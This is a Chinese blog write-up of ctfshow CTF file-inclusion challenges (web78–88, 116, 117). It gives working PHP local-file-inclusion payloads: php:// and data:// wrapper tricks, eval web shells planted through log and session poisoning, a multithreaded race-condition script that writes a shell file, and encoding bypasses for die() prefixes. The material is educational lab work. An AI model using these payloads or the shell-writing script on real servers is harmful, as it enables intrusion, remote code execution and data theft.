WEB入门——文件包含

image-20220915012654210

web78

此题为 【从0开始学web】系列第七十八题
此系列题目从最基础开始,题目遵循循序渐进的原则
希望对学习CTF WEB的同学有所帮助。
文件包含系列开始
<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

没有任何过滤,直接使用伪协议读取即可:(Hackbar的LFI里有集成好的模块,可以直接使用)

/?file=php://filter/convert.base64-encode/resource=flag.php
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3sxYTNlZTEwOS1iOGNiLTQ3ZjYtYTdjMi1hNjI2NmI4MmY4MGN9Ijs=
-------------------------------------------------------------
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:55:11
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:55:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{1a3ee109-b8cb-47f6-a7c2-a6266b82f80c}";

得到flag!!!

Hint

?file=php://filter/convert.base64-encode/resource=flag.php

web79

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

php进行了过滤。

解法一:base编码绕过

使用base64编码进行绕过。。

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

查看源代码得到flag!!!

解法二:data协议+正则匹配替换

file=data://text/plain,<?=system('tac fl*');?>

解法三:传shell

file=data://text/plain,<?=eval($_POST[1]);?>
POST 1=phpinfo();

Hint

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

web80

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了php,data,想着包含系统已经有的文件,例如 linux 下的var/log/nginx/access.log日志文件,日志包含。

日志包含

文件头传入eval

user-agent: <?php @eval($_POST['a']); ?>

包含日志文件

/?file=/var/log/nginx/access.log

POST发送命令

a=system('ls');

image-20220914154052886

找到文件名,直接cat即可:直接tac即可!

a=system('tac fl0g.php');

得到 flag!!!

Hint

包含日志文件 进行getshell 日志文件路径: ?file=/var/log/nginx/access.log

web81

做完这道题,你就已经经历的九九八十一难,是不是感觉很快?
没关系,后面还是九百一十九难,加油吧,少年!
<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

试试上一题的思路看看可以不。。。。。是可以的!

Hint

包含日志文件 进行getshell 日志文件路径: ?file=/var/log/nginx/access.log

web82

竞争环境需要晚上11点30分至次日7时30分之间做,其他时间不开放竞争条件

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

之前听说大师傅把网站修了以后白天可以做了不知道对不对,试试!

在cookie处添加PHPSESSID,这样提交的话会在默认session目录下生成类似于sess_aaa的文件,默认临时目录为/tmp/sess_aaa,这个文件名字是我们可以控制的

控制里面的内容需要PHP_SESSION_UPLOAD_PRGRESS参数,是用来获取实时文件的上传进度,它会返回一个session,用来实现写入的内容

大师傅条件竞争脚本解决

这里直接白嫖一下大师傅的脚本吧!

财迷

import requests
import io
import threading

url='http://4fb4c5f8-0655-4199-bb83-7c33b2c70259.challenge.ctf.show/'
sessionid="ctfshow"
data={
    "i":"file_put_contents('/var/www/html/1.php','<?php eval($_POST[1]);?>');"

}
def write(session):
    fileBytes = io.BytesIO(b'a'*1024*50)
    while True:
        response=session.post(url,
            data={
            'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
            },
            cookies={
            'PHPSESSID':sessionid
            },
            files={
            'file':('ctfshow.jpg',fileBytes)
            }
            )
        # print(response.text)

def read(session):
    while True:
        response=session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
            cookies={
            'PHPSESSID':sessionid
            }
            )
        response2=session.get(url+'1.php');
        if response2.status_code==200:
            print('+++++++++++++++done+++++++++++++++')
        else:
            print(response2.status_code)
if __name__ == '__main__':
    event=threading.Event()  #开启多线程
    with requests.session() as session:
        # read(session)
        for i in range(5):
            threading.Thread(target=write,args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read,args=(session,)).start()

    event.set()  #初始化

跑不通。。。一直是503,404之类的。。。。。

问过群里的师傅了,师傅们猜测是平台的问题,限制速度,太慢又包含不了,难过。。。。

bp条件竞争

先构造一个POST包:

<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>bp条件竞争</title>
</head>
<body>
<form action="http://2365b724-7bcd-4f24-bdec-7734babaa0c9.challenge.ctf.show/" method="post"
      enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="abc"/>
    <input type="file" name="fileupload"/>
    <input type="submit" name="submit" value="上传文件"/>
</form>
</body>
</html>

上传文件,修改包

随便上传一个文件,再加一个Cookie上去,并在PHP_SESSION_UPLOAD_PROGRESS添加命令语句!

POST / HTTP/1.1
Host: 2365b724-7bcd-4f24-bdec-7734babaa0c9.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1089288147727247033254480883
Content-Length: 489
Origin: http://localhost:63342
Connection: close
Referer: http://localhost:63342/
Upgrade-Insecure-Requests: 1
Cookie:PHPSESSID=flag

-----------------------------1089288147727247033254480883
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

§abc§<?php system('ls');?>
-----------------------------1089288147727247033254480883
Content-Disposition: form-data; name="fileupload"; filename="a.php"
Content-Type: application/octet-stream

-----------------------------1089288147727247033254480883
Content-Disposition: form-data; name="submit"

-----------------------------1089288147727247033254480883--

访问?file=/tmp/sess_flag,修改包

我没跑出来,离大浦了,还是等半个小时以后到11:30再试试脚本吧。。。。。

payloads配置

image-20220914225550738

Hint

https://www.freebuf.com/vuls/202819.html

这道题有点像wmctf的make php great again 利用session对话进行文件包含利用

https://blog.csdn.net/qq_46091464/article/details/108021053

web83

继续包含

竞争环境需要晚上11点30分至次日7时30分之间做,其他时间不开放竞争条件

web82

Hint

#poc.php
<!DOCTYPE html>
    <html>
    <body>
    <form action="ip地址" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
    </form>
    </body>
    </html>
    <?php
    session_start();
?>

web84

文件包含漏洞

竞争环境需要晚上11点30分至次日7时30分之间做,其他时间不开放竞争条件

web82

Hint

#poc.php
<!DOCTYPE html>
    <html>
    <body>
    <form action="ip地址" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
    </form>
    </body>
    </html>
    <?php
    session_start();
?>

web85

继续包含

竞争环境需要晚上11点30分至次日7时30分之间做,其他时间不开放竞争条件

web82

Hint

#poc.php
<!DOCTYPE html>
    <html>
    <body>
    <form action="ip地址" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
    </form>
    </body>
    </html>
    <?php
    session_start();
?>

web86

继续秀

竞争环境需要晚上11点30分至次日7时30分之间做,其他时间不开放竞争条件

web82

Hint

#poc.php
<!DOCTYPE html>
    <html>
    <body>
    <form action="ip地址" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
    </form>
    </body>
    </html>
    <?php
    session_start();
?>

web87

继续秀
<?php
    if(isset($_GET['file'])){
        $file = $_GET['file'];
        $content = $_POST['content'];
        $file = str_replace("php", "???", $file);
        $file = str_replace("data", "???", $file);
        $file = str_replace(":", "???", $file);
        $file = str_replace(".", "???", $file);
        file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
    }else{
        highlight_file(__FILE__);
    }

rot13过滤器进行编码(大师傅解法)

/?file=php://filter/write=string.rot13/resource=2.php

在post内容里写:

content=<?php system('tac f*.php');?>

但是题目对file进行了解码,所以这里我们要连续编码两次:

php://filter/write=string.rot13/resource=2.php
----------------------------------------
%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%77%72%69%74%65%3d%73%74%72%69%6e%67%2e%72%6f%74%31%33%2f%72%65%73%6f%75%72%63%65%3d%32%2e%70%68%70
----------------------------------------
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%32%25%32%65%25%37%30%25%36%38%25%37%30

再对POST内容进行rot编码:

<?php system('tac f*.php');?>
----------------------------------------
<?cuc flfgrz('gnp s*.cuc');?>

image-20220914204712340

没有反应,看一下2.php是否写入!

/2.php
------------------------------------------
$flag="ctfshow{c85dedf9-ae7d-4f1d-bc58-8570bfe25d3e}"; */ # @link: https://ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-16 11:25:00 # @Last Modified by: h1xa # @Date: 2020-09-16 11:24:37 # @Author: h1xa # -*- coding: utf-8 -*- /*

得到flag!!!!

Hint

https://www.leavesongs.com/PENETRATION/php-filter-magic.html 
https://xz.aliyun.com/t/8163#toc-3 
php://filter/write=string.rot13/resource=2.php

%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%2
5%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%
33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36
%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%3
3%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%
25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30
因为通过base64过滤之后就只有(phpdie)6个字符我们就要添加2个字符让前面的可以进行编码

web88

<?php
    if(isset($_GET['file'])){
        $file = $_GET['file'];
        if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
            die("error");
        }
        include($file);
    }else{
        highlight_file(__FILE__);
    }

利用data伪协议构造:

file=data://text/plain;base64,<?php system('tac f*.php');
file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7
$flag="ctfshow{0c146a77-e6ae-4d63-818d-7b4a79797c0f}"; */ # @link: https://ctfer.com # @email: h1xa@ctfer.com # @Last Modified time: 2020-09-16 11:25:00 # @Last Modified by: h1xa # @Date: 2020-09-16 11:24:37 # @Author: h1xa # -*- coding: utf-8 -*- /*

Hint

发现过滤的还是比较多,但是没有过滤 : 那我们就可以使用PHP伪协议就是 这里使用的是 data://text/plain;base64,poc 其实和79差不多 只是注意的是编码成base64的时候要去掉 =

web116

misc+lfi
by yu22x

打开环境以后是一段视频,题目都说了有misc了,那就直接下载下来,foremost看一下:

image-20220914213230386

看一下照片:

00080067

看到使用的是file_get_contents($file),使用file=flag.php

但是无法查看源代码,F12也看不到,使用view-source:可以看见flag!!!!

view-source:http://63d79276-a916-43e8-84c7-510bf1d5c66c.challenge.ctf.show/?file=flag.php
--------------------------------
<?php
$flag="ctfshow{8f0e0913-e236-4667-a83b-d413f86888d9}";
?>

终端使用curl也可以得到:

C:\Users\Administrator>curl http://63d79276-a916-43e8-84c7-510bf1d5c66c.challenge.ctf.show/?file=flag.php
<?php
$flag="ctfshow{8f0e0913-e236-4667-a83b-d413f86888d9}";
?>

web117

by yu22x
<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

这里是利用PHP的字符编码进行了筛选,write这个过滤器采用convert.iconv.UCS-2LE.UCS-2BE过滤掉了<?php die();?>,从而实现绕过。

convert.iconv.UCS-2LE.UCS-2BE这个是将前后两个字符进行交替(abcd==>badc)

当前 mbstring 模块支持以下的字符编码。这些字符编码中的任意一个都能指定到 mbstring 函数中的 encoding 参数。

该 PHP 扩展支持的字符编码有以下几种:

  • UCS-4*
  • UCS-4BE
  • UCS-4LE*
  • UCS-2
  • UCS-2BE
  • UCS-2LE
  • UTF-32*
  • UTF-32BE*
  • UTF-32LE*
  • UTF-16*
  • UTF-16BE*
  • UTF-16LE*
  • UTF-7
  • UTF7-IMAP
  • UTF-8*
  • ASCII*
  • EUC-JP*
  • SJIS*
  • eucJP-win*
  • SJIS-win*
  • ISO-2022-JP
  • ISO-2022-JP-MS
  • CP932
  • CP51932
  • SJIS-mac** (别名: MacJapanese)
  • SJIS-Mobile#DOCOMO** (别名: SJIS-DOCOMO)
  • SJIS-Mobile#KDDI** (别名: SJIS-KDDI)
  • SJIS-Mobile#SOFTBANK** (别名: SJIS-SOFTBANK)
  • UTF-8-Mobile#DOCOMO** (别名: UTF-8-DOCOMO)
  • UTF-8-Mobile#KDDI-A**
  • UTF-8-Mobile#KDDI-B** (别名: UTF-8-KDDI)
  • UTF-8-Mobile#SOFTBANK** (别名: UTF-8-SOFTBANK)
  • ISO-2022-JP-MOBILE#KDDI** (别名: ISO-2022-JP-KDDI)
  • JIS
  • JIS-ms
  • CP50220
  • CP50220raw
  • CP50221
  • CP50222
  • ISO-8859-1*
  • ISO-8859-2*
  • ISO-8859-3*
  • ISO-8859-4*
  • ISO-8859-5*
  • ISO-8859-6*
  • ISO-8859-7*
  • ISO-8859-8*
  • ISO-8859-9*
  • ISO-8859-10*
  • ISO-8859-13*
  • ISO-8859-14*
  • ISO-8859-15*
  • ISO-8859-16*
  • byte2be
  • byte2le
  • byte4be
  • byte4le
  • BASE64
  • HTML-ENTITIES
  • 7bit
  • 8bit
  • EUC-CN*
  • CP936
  • GB18030**
  • HZ
  • EUC-TW*
  • CP950
  • BIG-5*
  • EUC-KR*
  • UHC (CP949)
  • ISO-2022-KR
  • Windows-1251 (CP1251)
  • Windows-1252 (CP1252)
  • CP866 (IBM866)
  • KOI8-R*
  • KOI8-U*
  • ArmSCII-8 (ArmSCII8)

* 表示该编码也可以在正则表达式中使用。

** 表示该编码自 PHP 5.4.0 始可用。

payload: /?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php 
post:contents=?<hp pvela$(P_SO[T]1;)>?

再访问a.php

image-20220914221426673

得到flag!!!!

Hint

payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php post:contents=?<hp pvela$(P_SO[T]1;)>?
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇